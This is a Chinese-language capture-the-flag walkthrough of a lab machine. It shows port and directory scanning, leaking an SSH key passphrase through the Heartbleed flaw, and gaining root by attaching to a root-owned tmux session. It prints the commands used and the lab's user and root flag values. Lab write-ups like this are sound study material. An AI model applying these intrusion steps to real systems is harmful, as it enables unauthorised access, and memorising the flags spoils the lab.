0x00.前言

以前我总以为关注过程是完成一件事不可或缺的条件,后来才逐渐理解,有些事过程是多于的仁慈,结果才是碾碎那些荒谬强有力的武器。

0x01.信息搜集(扫端口,扫目录)

nmap -sC -sV -Pn 10.10.10.79
image-20220321223026266
feroxbuster -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
image-20220321223110730
image-20220321223129988
image-20220321223212243

得到hype_key,是hype用户经过base64编码的ssh密钥解码后可用(可用burp),用密钥登录时会提示需要私钥,需要通过SSL的心脏滴血漏洞拿到(多尝试利用几次)。

0x02.心脏滴血❣拿shell

Nmap检测心脏滴血:
nmap -p 443 --script ssl-heartbleed 10.10.10.79

运行心脏滴血利用脚本,得到:aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

image-20220321224001639

解码得到(hype私钥):heartbleedbelievethehype

ssh登录hype,在/home/hype/Desktop得到user.txt:e6710a5464769fd5fcd216e076961750

0x02.tmux本地提权

在本地开一个http服务,上传提权检测脚本Linpeas.sh.

Python开启HTTP服务:

Python <= 2.3
python -c "import SimpleHTTPServer as s; s.test();" 8000

Python >= 2.4
python -m SimpleHTTPServer 8000

Python 3.x
python -m http.server 8000

tmux是一个终端复用器,与传统终端区别在于,会话与窗口解绑,即窗口关闭,会话不终止,继续运行。

ps -aux|grep tmux    //查看带有tmux字符串的正在运行的进程

tmux -S /.devs/dev_sess    //连接到tmux,得到root
image-20220321224707935

(原本尝试了下内核提权,直接卡死,按内核版本看是没问题的。)

root.txt:f1bb6d759df1f272914ebbc9ed7765b2

0x03.总结

  • 1.扫目录得ssh密钥
  • 2.SSl心脏滴血得私钥,拿shell
  • 3.tmux本地提权得root
image-20220321225011236